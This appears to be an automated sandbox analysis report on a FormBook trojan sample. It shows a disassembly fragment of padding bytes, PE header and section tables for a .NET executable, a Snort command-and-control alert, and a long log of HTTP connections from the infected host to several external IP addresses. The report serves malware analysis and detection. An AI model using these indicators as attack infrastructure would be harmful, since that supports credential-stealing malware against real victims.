cmp byte ptr [ecx+50h], dl
xor eax, 36374734h
pop edx
inc ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc94e1	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xca000	0x694	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xc8200	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xcc000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xc57b4	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xc755c	0xc7600	e1bc0662d1503076cac0bdeae98bd259	False	0.927649882445141	data	7.9153685201395305	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xca000	0x694	0x800	a43bb112e84730d64ab2b1ce510e5020	False	0.3671875	data	3.629427701501083	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xcc000	0xc	0x200	aedd99f32b76161708f34e3bcee9adba	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xca090	0x404	data			0.4280155642023346
RT_MANIFEST	0xca4a4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/24/24-09:21:16.693302	TCP	2856318	ETPRO TROJAN FormBook CnC Checkin (POST) M4	49744	80	192.168.2.4	91.195.240.19

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 09:21:00.297530890 CEST	49743	80	192.168.2.4	47.76.62.167
Apr 24, 2024 09:21:00.634581089 CEST	80	49743	47.76.62.167	192.168.2.4
Apr 24, 2024 09:21:00.634785891 CEST	49743	80	192.168.2.4	47.76.62.167
Apr 24, 2024 09:21:00.643338919 CEST	49743	80	192.168.2.4	47.76.62.167
Apr 24, 2024 09:21:00.980837107 CEST	80	49743	47.76.62.167	192.168.2.4
Apr 24, 2024 09:21:00.981015921 CEST	80	49743	47.76.62.167	192.168.2.4
Apr 24, 2024 09:21:00.981090069 CEST	80	49743	47.76.62.167	192.168.2.4
Apr 24, 2024 09:21:00.981128931 CEST	80	49743	47.76.62.167	192.168.2.4
Apr 24, 2024 09:21:00.981146097 CEST	49743	80	192.168.2.4	47.76.62.167
Apr 24, 2024 09:21:00.981167078 CEST	80	49743	47.76.62.167	192.168.2.4
Apr 24, 2024 09:21:00.981251955 CEST	49743	80	192.168.2.4	47.76.62.167
Apr 24, 2024 09:21:00.986493111 CEST	49743	80	192.168.2.4	47.76.62.167
Apr 24, 2024 09:21:01.323523045 CEST	80	49743	47.76.62.167	192.168.2.4
Apr 24, 2024 09:21:16.383615971 CEST	49744	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:16.690649986 CEST	80	49744	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:16.690762043 CEST	49744	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:16.693301916 CEST	49744	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:17.001425982 CEST	80	49744	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:17.001471996 CEST	80	49744	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:17.001569033 CEST	49744	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:18.197602987 CEST	49744	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:19.216399908 CEST	49745	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:19.523690939 CEST	80	49745	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:19.523838997 CEST	49745	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:19.526483059 CEST	49745	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:19.836370945 CEST	80	49745	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:19.836426973 CEST	80	49745	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:19.836653948 CEST	49745	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:21.041258097 CEST	49745	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:22.060978889 CEST	49746	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:22.368010998 CEST	80	49746	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:22.368263960 CEST	49746	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:22.370654106 CEST	49746	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:22.680073023 CEST	80	49746	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:22.680332899 CEST	80	49746	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:22.680365086 CEST	80	49746	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:22.680397034 CEST	80	49746	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:22.680433035 CEST	80	49746	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:22.680464983 CEST	80	49746	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:22.680618048 CEST	80	49746	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:22.680757046 CEST	80	49746	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:22.683279991 CEST	80	49746	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:22.683315039 CEST	80	49746	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:22.683476925 CEST	49746	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:23.885042906 CEST	49746	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:24.903868914 CEST	49747	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:25.208420038 CEST	80	49747	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:25.208537102 CEST	49747	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:25.210408926 CEST	49747	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:25.555140972 CEST	80	49747	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:26.470026970 CEST	80	49747	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:26.470139027 CEST	80	49747	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:26.470180035 CEST	80	49747	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:26.470221043 CEST	80	49747	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:26.470261097 CEST	80	49747	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:26.470303059 CEST	80	49747	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:26.470316887 CEST	49747	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:26.470341921 CEST	80	49747	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:26.470386028 CEST	80	49747	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:26.470387936 CEST	49747	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:26.470387936 CEST	49747	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:26.470447063 CEST	49747	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:26.470500946 CEST	80	49747	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:26.470541954 CEST	80	49747	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:26.470602036 CEST	49747	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:26.774883986 CEST	80	49747	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:26.774949074 CEST	80	49747	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:26.774962902 CEST	80	49747	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:26.775016069 CEST	80	49747	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:26.775013924 CEST	49747	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:26.775048018 CEST	80	49747	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:26.775068998 CEST	49747	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:26.775100946 CEST	80	49747	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:26.775135994 CEST	80	49747	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:26.775147915 CEST	49747	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:26.775216103 CEST	80	49747	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:26.775264978 CEST	49747	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:26.775315046 CEST	80	49747	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:26.775357008 CEST	80	49747	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:26.775497913 CEST	49747	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:26.777986050 CEST	49747	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:21:27.082617044 CEST	80	49747	91.195.240.19	192.168.2.4
Apr 24, 2024 09:21:31.992400885 CEST	49748	80	192.168.2.4	91.195.240.123
Apr 24, 2024 09:21:32.299370050 CEST	80	49748	91.195.240.123	192.168.2.4
Apr 24, 2024 09:21:32.299508095 CEST	49748	80	192.168.2.4	91.195.240.123
Apr 24, 2024 09:21:32.301472902 CEST	49748	80	192.168.2.4	91.195.240.123
Apr 24, 2024 09:21:32.611880064 CEST	80	49748	91.195.240.123	192.168.2.4
Apr 24, 2024 09:21:32.611948967 CEST	80	49748	91.195.240.123	192.168.2.4
Apr 24, 2024 09:21:32.612016916 CEST	49748	80	192.168.2.4	91.195.240.123
Apr 24, 2024 09:21:33.806929111 CEST	49748	80	192.168.2.4	91.195.240.123
Apr 24, 2024 09:21:34.825846910 CEST	49749	80	192.168.2.4	91.195.240.123
Apr 24, 2024 09:21:35.130279064 CEST	80	49749	91.195.240.123	192.168.2.4
Apr 24, 2024 09:21:35.130474091 CEST	49749	80	192.168.2.4	91.195.240.123
Apr 24, 2024 09:21:35.133018970 CEST	49749	80	192.168.2.4	91.195.240.123
Apr 24, 2024 09:21:35.439516068 CEST	80	49749	91.195.240.123	192.168.2.4
Apr 24, 2024 09:21:35.439589977 CEST	80	49749	91.195.240.123	192.168.2.4
Apr 24, 2024 09:21:35.439666033 CEST	49749	80	192.168.2.4	91.195.240.123
Apr 24, 2024 09:21:36.641405106 CEST	49749	80	192.168.2.4	91.195.240.123
Apr 24, 2024 09:21:37.654834986 CEST	49750	80	192.168.2.4	91.195.240.123
Apr 24, 2024 09:21:37.962229013 CEST	80	49750	91.195.240.123	192.168.2.4
Apr 24, 2024 09:21:37.962351084 CEST	49750	80	192.168.2.4	91.195.240.123
Apr 24, 2024 09:21:37.964201927 CEST	49750	80	192.168.2.4	91.195.240.123
Apr 24, 2024 09:21:38.272660971 CEST	80	49750	91.195.240.123	192.168.2.4
Apr 24, 2024 09:21:38.272685051 CEST	80	49750	91.195.240.123	192.168.2.4
Apr 24, 2024 09:21:38.272701979 CEST	80	49750	91.195.240.123	192.168.2.4
Apr 24, 2024 09:21:38.272747993 CEST	80	49750	91.195.240.123	192.168.2.4
Apr 24, 2024 09:21:38.273336887 CEST	80	49750	91.195.240.123	192.168.2.4
Apr 24, 2024 09:21:38.273355007 CEST	80	49750	91.195.240.123	192.168.2.4
Apr 24, 2024 09:21:38.273432016 CEST	49750	80	192.168.2.4	91.195.240.123
Apr 24, 2024 09:21:39.478936911 CEST	49750	80	192.168.2.4	91.195.240.123
Apr 24, 2024 09:21:40.498405933 CEST	49751	80	192.168.2.4	91.195.240.123
Apr 24, 2024 09:21:40.803097963 CEST	80	49751	91.195.240.123	192.168.2.4
Apr 24, 2024 09:21:40.803227901 CEST	49751	80	192.168.2.4	91.195.240.123
Apr 24, 2024 09:21:41.098849058 CEST	49751	80	192.168.2.4	91.195.240.123
Apr 24, 2024 09:21:41.441888094 CEST	80	49751	91.195.240.123	192.168.2.4
Apr 24, 2024 09:21:41.441920042 CEST	80	49751	91.195.240.123	192.168.2.4
Apr 24, 2024 09:21:41.442064047 CEST	49751	80	192.168.2.4	91.195.240.123
Apr 24, 2024 09:21:41.444475889 CEST	49751	80	192.168.2.4	91.195.240.123
Apr 24, 2024 09:21:41.749038935 CEST	80	49751	91.195.240.123	192.168.2.4
Apr 24, 2024 09:21:55.200579882 CEST	49752	80	192.168.2.4	203.161.46.103
Apr 24, 2024 09:21:55.366286039 CEST	80	49752	203.161.46.103	192.168.2.4
Apr 24, 2024 09:21:55.366503000 CEST	49752	80	192.168.2.4	203.161.46.103
Apr 24, 2024 09:21:55.368951082 CEST	49752	80	192.168.2.4	203.161.46.103
Apr 24, 2024 09:21:55.534665108 CEST	80	49752	203.161.46.103	192.168.2.4
Apr 24, 2024 09:21:55.554104090 CEST	80	49752	203.161.46.103	192.168.2.4
Apr 24, 2024 09:21:55.554135084 CEST	80	49752	203.161.46.103	192.168.2.4
Apr 24, 2024 09:21:55.554193020 CEST	49752	80	192.168.2.4	203.161.46.103
Apr 24, 2024 09:21:56.885107040 CEST	49752	80	192.168.2.4	203.161.46.103
Apr 24, 2024 09:21:57.905409098 CEST	49753	80	192.168.2.4	203.161.46.103
Apr 24, 2024 09:21:58.070935965 CEST	80	49753	203.161.46.103	192.168.2.4
Apr 24, 2024 09:21:58.071044922 CEST	49753	80	192.168.2.4	203.161.46.103
Apr 24, 2024 09:21:58.074043036 CEST	49753	80	192.168.2.4	203.161.46.103
Apr 24, 2024 09:21:58.239882946 CEST	80	49753	203.161.46.103	192.168.2.4
Apr 24, 2024 09:21:58.250130892 CEST	80	49753	203.161.46.103	192.168.2.4
Apr 24, 2024 09:21:58.250169039 CEST	80	49753	203.161.46.103	192.168.2.4
Apr 24, 2024 09:21:58.250271082 CEST	49753	80	192.168.2.4	203.161.46.103
Apr 24, 2024 09:21:59.589232922 CEST	49753	80	192.168.2.4	203.161.46.103
Apr 24, 2024 09:22:00.609258890 CEST	49754	80	192.168.2.4	203.161.46.103
Apr 24, 2024 09:22:00.777028084 CEST	80	49754	203.161.46.103	192.168.2.4
Apr 24, 2024 09:22:00.777122974 CEST	49754	80	192.168.2.4	203.161.46.103
Apr 24, 2024 09:22:00.780741930 CEST	49754	80	192.168.2.4	203.161.46.103
Apr 24, 2024 09:22:00.946335077 CEST	80	49754	203.161.46.103	192.168.2.4
Apr 24, 2024 09:22:00.947705030 CEST	80	49754	203.161.46.103	192.168.2.4
Apr 24, 2024 09:22:00.947742939 CEST	80	49754	203.161.46.103	192.168.2.4
Apr 24, 2024 09:22:00.961513996 CEST	80	49754	203.161.46.103	192.168.2.4
Apr 24, 2024 09:22:00.961554050 CEST	80	49754	203.161.46.103	192.168.2.4
Apr 24, 2024 09:22:00.966212988 CEST	49754	80	192.168.2.4	203.161.46.103
Apr 24, 2024 09:22:02.291553974 CEST	49754	80	192.168.2.4	203.161.46.103
Apr 24, 2024 09:22:03.338217974 CEST	49755	80	192.168.2.4	203.161.46.103
Apr 24, 2024 09:22:03.504064083 CEST	80	49755	203.161.46.103	192.168.2.4
Apr 24, 2024 09:22:03.506304979 CEST	49755	80	192.168.2.4	203.161.46.103
Apr 24, 2024 09:22:03.509206057 CEST	49755	80	192.168.2.4	203.161.46.103
Apr 24, 2024 09:22:03.675127983 CEST	80	49755	203.161.46.103	192.168.2.4
Apr 24, 2024 09:22:03.692945004 CEST	80	49755	203.161.46.103	192.168.2.4
Apr 24, 2024 09:22:03.692986012 CEST	80	49755	203.161.46.103	192.168.2.4
Apr 24, 2024 09:22:03.693139076 CEST	49755	80	192.168.2.4	203.161.46.103
Apr 24, 2024 09:22:03.698204994 CEST	49755	80	192.168.2.4	203.161.46.103
Apr 24, 2024 09:22:03.863918066 CEST	80	49755	203.161.46.103	192.168.2.4
Apr 24, 2024 09:22:09.918204069 CEST	49756	80	192.168.2.4	195.242.88.141
Apr 24, 2024 09:22:10.244335890 CEST	80	49756	195.242.88.141	192.168.2.4
Apr 24, 2024 09:22:10.244410038 CEST	49756	80	192.168.2.4	195.242.88.141
Apr 24, 2024 09:22:10.247292042 CEST	49756	80	192.168.2.4	195.242.88.141
Apr 24, 2024 09:22:10.573542118 CEST	80	49756	195.242.88.141	192.168.2.4
Apr 24, 2024 09:22:10.573885918 CEST	80	49756	195.242.88.141	192.168.2.4
Apr 24, 2024 09:22:10.573925018 CEST	80	49756	195.242.88.141	192.168.2.4
Apr 24, 2024 09:22:10.573986053 CEST	49756	80	192.168.2.4	195.242.88.141
Apr 24, 2024 09:22:11.760062933 CEST	49756	80	192.168.2.4	195.242.88.141
Apr 24, 2024 09:22:12.780061960 CEST	49757	80	192.168.2.4	195.242.88.141
Apr 24, 2024 09:22:13.109596014 CEST	80	49757	195.242.88.141	192.168.2.4
Apr 24, 2024 09:22:13.109735012 CEST	49757	80	192.168.2.4	195.242.88.141
Apr 24, 2024 09:22:13.111736059 CEST	49757	80	192.168.2.4	195.242.88.141
Apr 24, 2024 09:22:13.437777996 CEST	80	49757	195.242.88.141	192.168.2.4
Apr 24, 2024 09:22:13.438235998 CEST	80	49757	195.242.88.141	192.168.2.4
Apr 24, 2024 09:22:13.438388109 CEST	80	49757	195.242.88.141	192.168.2.4
Apr 24, 2024 09:22:13.438707113 CEST	49757	80	192.168.2.4	195.242.88.141
Apr 24, 2024 09:22:14.965277910 CEST	49757	80	192.168.2.4	195.242.88.141
Apr 24, 2024 09:22:15.982419968 CEST	49758	80	192.168.2.4	195.242.88.141
Apr 24, 2024 09:22:16.308235884 CEST	80	49758	195.242.88.141	192.168.2.4
Apr 24, 2024 09:22:16.308346033 CEST	49758	80	192.168.2.4	195.242.88.141
Apr 24, 2024 09:22:16.310743093 CEST	49758	80	192.168.2.4	195.242.88.141
Apr 24, 2024 09:22:16.636405945 CEST	80	49758	195.242.88.141	192.168.2.4
Apr 24, 2024 09:22:16.636454105 CEST	80	49758	195.242.88.141	192.168.2.4
Apr 24, 2024 09:22:16.636487007 CEST	80	49758	195.242.88.141	192.168.2.4
Apr 24, 2024 09:22:16.636528015 CEST	80	49758	195.242.88.141	192.168.2.4
Apr 24, 2024 09:22:16.636559963 CEST	80	49758	195.242.88.141	192.168.2.4
Apr 24, 2024 09:22:16.636651993 CEST	80	49758	195.242.88.141	192.168.2.4
Apr 24, 2024 09:22:16.636732101 CEST	80	49758	195.242.88.141	192.168.2.4
Apr 24, 2024 09:22:16.636765003 CEST	80	49758	195.242.88.141	192.168.2.4
Apr 24, 2024 09:22:16.636907101 CEST	80	49758	195.242.88.141	192.168.2.4
Apr 24, 2024 09:22:16.636940956 CEST	80	49758	195.242.88.141	192.168.2.4
Apr 24, 2024 09:22:16.636996984 CEST	49758	80	192.168.2.4	195.242.88.141
Apr 24, 2024 09:22:17.822642088 CEST	49758	80	192.168.2.4	195.242.88.141
Apr 24, 2024 09:22:18.842281103 CEST	49759	80	192.168.2.4	195.242.88.141
Apr 24, 2024 09:22:19.168159962 CEST	80	49759	195.242.88.141	192.168.2.4
Apr 24, 2024 09:22:19.168401003 CEST	49759	80	192.168.2.4	195.242.88.141
Apr 24, 2024 09:22:19.172328949 CEST	49759	80	192.168.2.4	195.242.88.141
Apr 24, 2024 09:22:19.497797966 CEST	80	49759	195.242.88.141	192.168.2.4
Apr 24, 2024 09:22:19.498409986 CEST	80	49759	195.242.88.141	192.168.2.4
Apr 24, 2024 09:22:19.498455048 CEST	80	49759	195.242.88.141	192.168.2.4
Apr 24, 2024 09:22:19.498591900 CEST	49759	80	192.168.2.4	195.242.88.141
Apr 24, 2024 09:22:19.501194954 CEST	49759	80	192.168.2.4	195.242.88.141
Apr 24, 2024 09:22:19.826702118 CEST	80	49759	195.242.88.141	192.168.2.4
Apr 24, 2024 09:22:24.823540926 CEST	49760	80	192.168.2.4	74.208.236.153
Apr 24, 2024 09:22:25.021553993 CEST	80	49760	74.208.236.153	192.168.2.4
Apr 24, 2024 09:22:25.026338100 CEST	49760	80	192.168.2.4	74.208.236.153
Apr 24, 2024 09:22:25.030217886 CEST	49760	80	192.168.2.4	74.208.236.153
Apr 24, 2024 09:22:25.228018999 CEST	80	49760	74.208.236.153	192.168.2.4
Apr 24, 2024 09:22:25.235002995 CEST	80	49760	74.208.236.153	192.168.2.4
Apr 24, 2024 09:22:25.235064030 CEST	80	49760	74.208.236.153	192.168.2.4
Apr 24, 2024 09:22:25.235457897 CEST	49760	80	192.168.2.4	74.208.236.153
Apr 24, 2024 09:22:26.541321039 CEST	49760	80	192.168.2.4	74.208.236.153
Apr 24, 2024 09:22:27.561419964 CEST	49761	80	192.168.2.4	74.208.236.153
Apr 24, 2024 09:22:27.757294893 CEST	80	49761	74.208.236.153	192.168.2.4
Apr 24, 2024 09:22:27.760725975 CEST	49761	80	192.168.2.4	74.208.236.153
Apr 24, 2024 09:22:27.764883995 CEST	49761	80	192.168.2.4	74.208.236.153
Apr 24, 2024 09:22:27.963823080 CEST	80	49761	74.208.236.153	192.168.2.4
Apr 24, 2024 09:22:27.971296072 CEST	80	49761	74.208.236.153	192.168.2.4
Apr 24, 2024 09:22:27.971335888 CEST	80	49761	74.208.236.153	192.168.2.4
Apr 24, 2024 09:22:27.971394062 CEST	49761	80	192.168.2.4	74.208.236.153
Apr 24, 2024 09:22:29.276221991 CEST	49761	80	192.168.2.4	74.208.236.153
Apr 24, 2024 09:22:30.295687914 CEST	49762	80	192.168.2.4	74.208.236.153
Apr 24, 2024 09:22:30.491378069 CEST	80	49762	74.208.236.153	192.168.2.4
Apr 24, 2024 09:22:30.491461992 CEST	49762	80	192.168.2.4	74.208.236.153
Apr 24, 2024 09:22:30.494770050 CEST	49762	80	192.168.2.4	74.208.236.153
Apr 24, 2024 09:22:30.690429926 CEST	80	49762	74.208.236.153	192.168.2.4
Apr 24, 2024 09:22:30.690473080 CEST	80	49762	74.208.236.153	192.168.2.4
Apr 24, 2024 09:22:30.690504074 CEST	80	49762	74.208.236.153	192.168.2.4
Apr 24, 2024 09:22:30.690536976 CEST	80	49762	74.208.236.153	192.168.2.4
Apr 24, 2024 09:22:30.690582991 CEST	80	49762	74.208.236.153	192.168.2.4
Apr 24, 2024 09:22:30.690615892 CEST	80	49762	74.208.236.153	192.168.2.4
Apr 24, 2024 09:22:30.690645933 CEST	80	49762	74.208.236.153	192.168.2.4
Apr 24, 2024 09:22:30.690737009 CEST	80	49762	74.208.236.153	192.168.2.4
Apr 24, 2024 09:22:30.690787077 CEST	80	49762	74.208.236.153	192.168.2.4
Apr 24, 2024 09:22:30.697737932 CEST	80	49762	74.208.236.153	192.168.2.4
Apr 24, 2024 09:22:30.697774887 CEST	80	49762	74.208.236.153	192.168.2.4
Apr 24, 2024 09:22:30.697952032 CEST	49762	80	192.168.2.4	74.208.236.153
Apr 24, 2024 09:22:32.010066032 CEST	49762	80	192.168.2.4	74.208.236.153
Apr 24, 2024 09:22:33.028956890 CEST	49763	80	192.168.2.4	74.208.236.153
Apr 24, 2024 09:22:33.230688095 CEST	80	49763	74.208.236.153	192.168.2.4
Apr 24, 2024 09:22:33.233103991 CEST	49763	80	192.168.2.4	74.208.236.153
Apr 24, 2024 09:22:33.236217022 CEST	49763	80	192.168.2.4	74.208.236.153
Apr 24, 2024 09:22:33.434026957 CEST	80	49763	74.208.236.153	192.168.2.4
Apr 24, 2024 09:22:33.441088915 CEST	80	49763	74.208.236.153	192.168.2.4
Apr 24, 2024 09:22:33.441792011 CEST	80	49763	74.208.236.153	192.168.2.4
Apr 24, 2024 09:22:33.444569111 CEST	49763	80	192.168.2.4	74.208.236.153
Apr 24, 2024 09:22:33.448451996 CEST	49763	80	192.168.2.4	74.208.236.153
Apr 24, 2024 09:22:33.646285057 CEST	80	49763	74.208.236.153	192.168.2.4
Apr 24, 2024 09:22:38.816662073 CEST	49764	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:39.121030092 CEST	80	49764	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:39.124614000 CEST	49764	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:39.172365904 CEST	49764	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:39.479015112 CEST	80	49764	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:39.479034901 CEST	80	49764	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:39.479115963 CEST	49764	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:40.682030916 CEST	49764	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:41.700613022 CEST	49765	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:42.008148909 CEST	80	49765	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:42.008234978 CEST	49765	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:42.010854959 CEST	49765	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:42.320332050 CEST	80	49765	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:42.320357084 CEST	80	49765	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:42.320406914 CEST	49765	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:43.526222944 CEST	49765	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:44.545078039 CEST	49766	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:44.849900007 CEST	80	49766	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:44.849992037 CEST	49766	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:44.852991104 CEST	49766	80	192.168.2.4	91.195.240.19
Apr 24, 2024 09:22:45.157731056 CEST	80	49766	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:45.157777071 CEST	80	49766	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:45.157809973 CEST	80	49766	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:45.157839060 CEST	80	49766	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:45.157888889 CEST	80	49766	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:45.157919884 CEST	80	49766	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:45.157951117 CEST	80	49766	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:45.157995939 CEST	80	49766	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:45.158025980 CEST	80	49766	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:45.158405066 CEST	80	49766	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:45.158483028 CEST	80	49766	91.195.240.19	192.168.2.4
Apr 24, 2024 09:22:45.166244030 CEST	49766	80	192.168.2.4	91.195.240.19
